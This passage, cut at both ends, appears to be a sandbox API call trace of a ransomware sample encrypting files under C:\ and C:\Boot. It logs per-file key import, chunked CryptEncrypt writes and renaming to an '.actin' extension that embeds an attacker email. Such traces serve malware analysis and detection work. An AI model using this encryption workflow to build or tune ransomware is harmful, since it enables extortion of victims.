pbData=0x38efb30, dwFlags=0x0) returned 1 [0056.581] CryptEncrypt (in: hKey=0xf72080, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x50, dwBufLen=0x50 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x50) returned 1 [0056.581] CryptDestroyKey (hKey=0xf72080) returned 1 [0056.581] WriteFile (in: hFile=0x330, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x102, lpOverlapped=0x0) returned 1 [0056.582] CryptDestroyKey (hKey=0xf71c40) returned 1 [0056.582] CloseHandle (hObject=0x328) returned 1 [0056.582] CloseHandle (hObject=0x330) returned 1 [0056.583] DeleteFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\SplashScreen.bmp" (normalized: "c:\\588bce7c90097ed212\\splashscreen.bmp")) returned 1 [0056.753] SetEvent (hEvent=0x2e8) returned 1 [0056.753] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x38efb30 | out: pbBuffer=0x38efb30) returned 1 [0056.753] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Windows6.0-KB956250-v6001-x86.msu" (normalized: "c:\\588bce7c90097ed212\\windows6.0-kb956250-v6001-x86.msu"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0056.753] GetFileSizeEx (in: hFile=0x300, lpFileSize=0x38efac8 | out: lpFileSize=0x38efac8*=2192672) returned 1 [0056.753] CloseHandle (hObject=0x300) returned 1 [0056.753] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Windows6.0-KB956250-v6001-x86.msu" (normalized: "c:\\588bce7c90097ed212\\windows6.0-kb956250-v6001-x86.msu")) returned 0x80 [0056.753] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\Windows6.0-KB956250-v6001-x86.msu" (normalized: "c:\\588bce7c90097ed212\\windows6.0-kb956250-v6001-x86.msu"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\Windows6.0-KB956250-v6001-x86.msu.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\windows6.0-kb956250-v6001-x86.msu.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 1 [0056.754] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Windows6.0-KB956250-v6001-x86.msu.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\windows6.0-kb956250-v6001-x86.msu.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0056.754] SetFilePointerEx (in: hFile=0x300, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa38 | out: lpNewFilePointer=0x0) returned 1 [0056.754] SetFilePointerEx (in: hFile=0x300, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa38 | out: lpNewFilePointer=0x0) returned 1 [0056.754] ReadFile (in: hFile=0x300, lpBuffer=0x3e5c058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x38efa44, lpOverlapped=0x0 | out: lpBuffer=0x3e5c058*, lpNumberOfBytesRead=0x38efa44*=0x40000, lpOverlapped=0x0) returned 1 [0056.759] SetFilePointerEx (in: hFile=0x300, liDistanceToMove=0xb270a, lpNewFilePointer=0x0, dwMoveMethod=0x38efa38 | out: lpNewFilePointer=0x0) returned 1 [0056.759] ReadFile (in: hFile=0x300, lpBuffer=0x3e9c058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x38efa44, lpOverlapped=0x0 | out: lpBuffer=0x3e9c058*, lpNumberOfBytesRead=0x38efa44*=0x40000, lpOverlapped=0x0) returned 1 [0056.762] SetFilePointerEx (in: hFile=0x300, liDistanceToMove=0x1d7520, lpNewFilePointer=0x0, dwMoveMethod=0x38efa38 | out: lpNewFilePointer=0x0) returned 1 [0056.762] ReadFile (in: hFile=0x300, lpBuffer=0x3edc058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x38efa44, lpOverlapped=0x0 | out: lpBuffer=0x3edc058*, lpNumberOfBytesRead=0x38efa44*=0x40000, lpOverlapped=0x0) returned 1 [0056.774] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa94 | out: phKey=0x38efa94*=0xf71d40) returned 1 [0056.774] CryptSetKeyParam (hKey=0xf71d40, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0056.775] CryptEncrypt (in: hKey=0xf71d40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa48*=0xc0080, dwBufLen=0xc0080 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa48*=0xc0080) returned 1 [0056.776] CryptDestroyKey (hKey=0xf71d40) returned 1 [0056.776] SetFilePointerEx (in: hFile=0x300, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa70 | out: lpNewFilePointer=0x0) returned 1 [0056.776] WriteFile (in: hFile=0x300, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0xc0132, lpNumberOfBytesWritten=0x38efa80, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa80*=0xc0132, lpOverlapped=0x0) returned 1 [0057.073] SetEndOfFile (hFile=0x300) returned 1 [0057.074] SetFilePointerEx (in: hFile=0x300, liDistanceToMove=0x1d7520, lpNewFilePointer=0x0, dwMoveMethod=0x38efa40 | out: lpNewFilePointer=0x0) returned 1 [0057.074] WriteFile (in: hFile=0x300, lpBuffer=0x3f1c16a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x38efa4c, lpOverlapped=0x0 | out: lpBuffer=0x3f1c16a*, lpNumberOfBytesWritten=0x38efa4c*=0x40000, lpOverlapped=0x0) returned 1 [0057.075] SetFilePointerEx (in: hFile=0x300, liDistanceToMove=0xb270a, lpNewFilePointer=0x0, dwMoveMethod=0x38efa40 | out: lpNewFilePointer=0x0) returned 1 [0057.075] WriteFile (in: hFile=0x300, lpBuffer=0x3f1c16a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x38efa4c, lpOverlapped=0x0 | out: lpBuffer=0x3f1c16a*, lpNumberOfBytesWritten=0x38efa4c*=0x40000, lpOverlapped=0x0) returned 1 [0057.077] SetFilePointerEx (in: hFile=0x300, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa40 | out: lpNewFilePointer=0x0) returned 1 [0057.077] WriteFile (in: hFile=0x300, lpBuffer=0x3f1c16a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x38efa4c, lpOverlapped=0x0 | out: lpBuffer=0x3f1c16a*, lpNumberOfBytesWritten=0x38efa4c*=0x40000, lpOverlapped=0x0) returned 1 [0057.079] CloseHandle (hObject=0x300) returned 1 [0057.314] SetEvent (hEvent=0x2e8) returned 1 [0057.315] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x38efb30 | out: pbBuffer=0x38efb30) returned 1 [0057.315] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Windows6.1-KB958488-v6001-x64.msu" (normalized: "c:\\588bce7c90097ed212\\windows6.1-kb958488-v6001-x64.msu"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0057.315] GetFileSizeEx (in: hFile=0x300, lpFileSize=0x38efac8 | out: lpFileSize=0x38efac8*=5091790) returned 1 [0057.315] CloseHandle (hObject=0x300) returned 1 [0057.315] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Windows6.1-KB958488-v6001-x64.msu" (normalized: "c:\\588bce7c90097ed212\\windows6.1-kb958488-v6001-x64.msu")) returned 0x80 [0057.315] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\Windows6.1-KB958488-v6001-x64.msu" (normalized: "c:\\588bce7c90097ed212\\windows6.1-kb958488-v6001-x64.msu"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\Windows6.1-KB958488-v6001-x64.msu.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\windows6.1-kb958488-v6001-x64.msu.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 1 [0057.316] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Windows6.1-KB958488-v6001-x64.msu.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\windows6.1-kb958488-v6001-x64.msu.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0057.316] SetFilePointerEx (in: hFile=0x300, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa38 | out: lpNewFilePointer=0x0) returned 1 [0057.316] SetFilePointerEx (in: hFile=0x300, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa38 | out: lpNewFilePointer=0x0) returned 1 [0057.316] ReadFile (in: hFile=0x300, lpBuffer=0x3e5c058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x38efa44, lpOverlapped=0x0 | out: lpBuffer=0x3e5c058*, lpNumberOfBytesRead=0x38efa44*=0x40000, lpOverlapped=0x0) returned 1 [0057.593] SetFilePointerEx (in: hFile=0x300, liDistanceToMove=0x19e5ef, lpNewFilePointer=0x0, dwMoveMethod=0x38efa38 | out: lpNewFilePointer=0x0) returned 1 [0057.593] ReadFile (in: hFile=0x300, lpBuffer=0x3e9c058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x38efa44, lpOverlapped=0x0 | out: lpBuffer=0x3e9c058*, lpNumberOfBytesRead=0x38efa44*=0x40000, lpOverlapped=0x0) returned 1 [0057.598] SetFilePointerEx (in: hFile=0x300, liDistanceToMove=0x49b1ce, lpNewFilePointer=0x0, dwMoveMethod=0x38efa38 | out: lpNewFilePointer=0x0) returned 1 [0057.598] ReadFile (in: hFile=0x300, lpBuffer=0x3edc058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x38efa44, lpOverlapped=0x0 | out: lpBuffer=0x3edc058*, lpNumberOfBytesRead=0x38efa44*=0x40000, lpOverlapped=0x0) returned 1 [0057.602] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa94 | out: phKey=0x38efa94*=0xf72080) returned 1 [0057.602] CryptSetKeyParam (hKey=0xf72080, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0057.603] CryptEncrypt (in: hKey=0xf72080, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa48*=0xc0080, dwBufLen=0xc0080 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa48*=0xc0080) returned 1 [0057.604] CryptDestroyKey (hKey=0xf72080) returned 1 [0057.604] SetFilePointerEx (in: hFile=0x300, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa70 | out: lpNewFilePointer=0x0) returned 1 [0057.604] WriteFile (in: hFile=0x300, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0xc0132, lpNumberOfBytesWritten=0x38efa80, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa80*=0xc0132, lpOverlapped=0x0) returned 1 [0057.626] SetEndOfFile (hFile=0x300) returned 1 [0057.626] SetFilePointerEx (in: hFile=0x300, liDistanceToMove=0x49b1ce, lpNewFilePointer=0x0, dwMoveMethod=0x38efa40 | out: lpNewFilePointer=0x0) returned 1 [0057.626] WriteFile (in: hFile=0x300, lpBuffer=0x3f1c16a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x38efa4c, lpOverlapped=0x0 | out: lpBuffer=0x3f1c16a*, lpNumberOfBytesWritten=0x38efa4c*=0x40000, lpOverlapped=0x0) returned 1 [0057.628] SetFilePointerEx (in: hFile=0x300, liDistanceToMove=0x19e5ef, lpNewFilePointer=0x0, dwMoveMethod=0x38efa40 | out: lpNewFilePointer=0x0) returned 1 [0057.628] WriteFile (in: hFile=0x300, lpBuffer=0x3f1c16a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x38efa4c, lpOverlapped=0x0 | out: lpBuffer=0x3f1c16a*, lpNumberOfBytesWritten=0x38efa4c*=0x40000, lpOverlapped=0x0) returned 1 [0057.630] SetFilePointerEx (in: hFile=0x300, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa40 | out: lpNewFilePointer=0x0) returned 1 [0057.630] WriteFile (in: hFile=0x300, lpBuffer=0x3f1c16a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x38efa4c, lpOverlapped=0x0 | out: lpBuffer=0x3f1c16a*, lpNumberOfBytesWritten=0x38efa4c*=0x40000, lpOverlapped=0x0) returned 1 [0057.913] CloseHandle (hObject=0x300) returned 1 [0059.524] SetEvent (hEvent=0x2e8) returned 1 [0059.525] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x38efb30 | out: pbBuffer=0x38efb30) returned 1 [0059.525] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\en-GB\\bootmgr.exe.mui" (normalized: "c:\\boot\\en-gb\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0059.525] GetFileSizeEx (in: hFile=0x300, lpFileSize=0x38efac8 | out: lpFileSize=0x38efac8*=74072) returned 1 [0059.525] CloseHandle (hObject=0x300) returned 1 [0059.525] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\en-GB\\bootmgr.exe.mui" (normalized: "c:\\boot\\en-gb\\bootmgr.exe.mui")) returned 0x20 [0059.525] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\en-GB\\bootmgr.exe.mui.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\boot\\en-gb\\bootmgr.exe.mui.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0059.525] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\en-GB\\bootmgr.exe.mui" (normalized: "c:\\boot\\en-gb\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0059.526] SetEvent (hEvent=0x2e8) returned 1 [0059.526] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x38efb30 | out: pbBuffer=0x38efb30) returned 1 [0059.526] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\en-US\\bootmgr.exe.mui" (normalized: "c:\\boot\\en-us\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0059.526] GetFileSizeEx (in: hFile=0x300, lpFileSize=0x38efac8 | out: lpFileSize=0x38efac8*=74144) returned 1 [0059.526] CloseHandle (hObject=0x300) returned 1 [0059.526] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\en-US\\bootmgr.exe.mui" (normalized: "c:\\boot\\en-us\\bootmgr.exe.mui")) returned 0x20 [0059.526] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\en-US\\bootmgr.exe.mui.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\boot\\en-us\\bootmgr.exe.mui.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0059.526] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\en-US\\bootmgr.exe.mui" (normalized: "c:\\boot\\en-us\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0059.526] SetEvent (hEvent=0x2e8) returned 1 [0059.526] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x38efb30 | out: pbBuffer=0x38efb30) returned 1 [0059.527] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\en-US\\memtest.exe.mui" (normalized: "c:\\boot\\en-us\\memtest.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0059.527] GetFileSizeEx (in: hFile=0x300, lpFileSize=0x38efac8 | out: lpFileSize=0x38efac8*=44960) returned 1 [0059.527] CloseHandle (hObject=0x300) returned 1 [0059.527] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\en-US\\memtest.exe.mui" (normalized: "c:\\boot\\en-us\\memtest.exe.mui")) returned 0x20 [0059.527] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\en-US\\memtest.exe.mui.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\boot\\en-us\\memtest.exe.mui.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0059.527] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\en-US\\memtest.exe.mui" (normalized: "c:\\boot\\en-us\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0059.527] SetEvent (hEvent=0x2e8) returned 1 [0059.527] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x38efb30 | out: pbBuffer=0x38efb30) returned 1 [0059.527] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\es-ES\\bootmgr.exe.mui" (normalized: "c:\\boot\\es-es\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0059.527] GetFileSizeEx (in: hFile=0x300, lpFileSize=0x38efac8 | out: lpFileSize=0x38efac8*=77664) returned 1 [0059.527] CloseHandle (hObject=0x300) returned 1 [0059.527] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\es-ES\\bootmgr.exe.mui" (normalized: "c:\\boot\\es-es\\bootmgr.exe.mui")) returned 0x20 [0059.528] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\es-ES\\bootmgr.exe.mui.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\boot\\es-es\\bootmgr.exe.mui.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0059.528] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\es-ES\\bootmgr.exe.mui" (normalized: "c:\\boot\\es-es\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0059.528] SetEvent (hEvent=0x2e8) returned 1 [0059.528] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x38efb30 | out: pbBuffer=0x38efb30) returned 1 [0059.528] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\es-ES\\memtest.exe.mui" (normalized: "c:\\boot\\es-es\\memtest.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0059.528] GetFileSizeEx (in: hFile=0x300, lpFileSize=0x38efac8 | out: lpFileSize=0x38efac8*=45984) returned 1 [0059.528] CloseHandle (hObject=0x300) returned 1 [0059.528] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\es-ES\\memtest.exe.mui" (normalized: "c:\\boot\\es-es\\memtest.exe.mui")) returned 0x20 [0059.528] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\es-ES\\memtest.exe.mui.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\boot\\es-es\\memtest.exe.mui.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0059.528] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\es-ES\\memtest.exe.mui" (normalized: "c:\\boot\\es-es\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0059.528] SetEvent (hEvent=0x2e8) returned 1 [0059.529] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x38efb30 | out: pbBuffer=0x38efb30) returned 1 [0059.529] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\es-MX\\bootmgr.exe.mui" (normalized: "c:\\boot\\es-mx\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0059.529] GetFileSizeEx (in: hFile=0x300, lpFileSize=0x38efac8 | out: lpFileSize=0x38efac8*=77664) returned 1 [0059.529] CloseHandle (hObject=0x300) returned 1 [0059.529] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\es-MX\\bootmgr.exe.mui" (normalized: "c:\\boot\\es-mx\\bootmgr.exe.mui")) returned 0x20 [0059.529] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\es-MX\\bootmgr.exe.mui.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\boot\\es-mx\\bootmgr.exe.mui.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0059.529] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\es-MX\\bootmgr.exe.mui" (normalized: "c:\\boot\\es-mx\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0059.529] SetEvent (hEvent=0x2e8) returned 1 [0059.529] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x38efb30 | out: pbBuffer=0x38efb30) returned 1 [0059.530] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\et-EE\\bootmgr.exe.mui" (normalized: "c:\\boot\\et-ee\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0059.530] GetFileSizeEx (in: hFile=0x300, lpFileSize=0x38efac8 | out: lpFileSize=0x38efac8*=75104) returned 1 [0059.530] CloseHandle (hObject=0x300) returned 1 [0059.530] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\et-EE\\bootmgr.exe.mui" (normalized: "c:\\boot\\et-ee\\bootmgr.exe.mui")) returned 0x20 [0059.530] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\et-EE\\bootmgr.exe.mui.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\boot\\et-ee\\bootmgr.exe.mui.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0059.530] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\et-EE\\bootmgr.exe.mui" (normalized: "c:\\boot\\et-ee\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0059.530] SetEvent (hEvent=0x2e8) returned 1 [0059.530] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x38efb30 | out: pbBuffer=0x38efb30) returned 1 [0059.530] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\fi-FI\\bootmgr.exe.mui" (normalized: "c:\\boot\\fi-fi\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0059.530] GetFileSizeEx (in: hFile=0x300, lpFileSize=0x38efac8 | out: lpFileSize=0x38efac8*=76640) returned 1 [0059.530] CloseHandle (hObject=0x300) returned 1 [0059.531] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\fi-FI\\bootmgr.exe.mui" (normalized: "c:\\boot\\fi-fi\\bootmgr.exe.mui")) returned 0x20 [0059.531] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\fi-FI\\bootmgr.exe.mui.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\boot\\fi-fi\\bootmgr.exe.mui.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0059.531] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\fi-FI\\bootmgr.exe.mui" (normalized: "c:\\boot\\fi-fi\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0059.531] SetEvent (hEvent=0x2e8) returned 1 [0059.531] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x38efb30 | out: pbBuffer=0x38efb30) returned 1 [0059.531] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\fi-FI\\memtest.exe.mui" (normalized: "c:\\boot\\fi-fi\\memtest.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0059.531] GetFileSizeEx (in: hFile=0x300, lpFileSize=0x38efac8 | out: lpFileSize=0x38efac8*=45472) returned 1 [0059.531] CloseHandle (hObject=0x300) returned 1 [0059.531] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\fi-FI\\memtest.exe.mui" (normalized: "c:\\boot\\fi-fi\\memtest.exe.mui")) returned 0x20 [0059.531] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\fi-FI\\memtest.exe.mui.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\boot\\fi-fi\\memtest.exe.mui.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0059.531] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\fi-FI\\memtest.exe.mui" (normalized: "c:\\boot\\fi-fi\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0059.531] SetEvent (hEvent=0x2e8) returned 1 [0059.532] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x38efb30 | out: pbBuffer=0x38efb30) returned 1 [0059.532] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\chs_boot.ttf" (normalized: "c:\\boot\\fonts\\chs_boot.ttf"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0059.534] GetFileSizeEx (in: hFile=0x300, lpFileSize=0x38efac8 | out: lpFileSize=0x38efac8*=3695719) returned 1 [0059.534] CloseHandle (hObject=0x300) returned 1 [0059.534] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\chs_boot.ttf" (normalized: "c:\\boot\\fonts\\chs_boot.ttf")) returned 0x20 [0059.534] MoveFileW (lpExistingFileName="\\\\?\\C:\\Boot\\Fonts\\chs_boot.ttf" (normalized: "c:\\boot\\fonts\\chs_boot.ttf"), lpNewFileName="\\\\?\\C:\\Boot\\Fonts\\chs_boot.ttf.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\boot\\fonts\\chs_boot.ttf.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0 [0059.534] MoveFileW (lpExistingFileName="\\\\?\\C:\\Boot\\Fonts\\chs_boot.ttf.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\boot\\fonts\\chs_boot.ttf.id[b4197730-0115].[fileisafe@tuta.io].actin"), lpNewFileName="\\\\?\\C:\\Boot\\Fonts\\chs_boot.ttf" (normalized: "c:\\boot\\fonts\\chs_boot.ttf")) 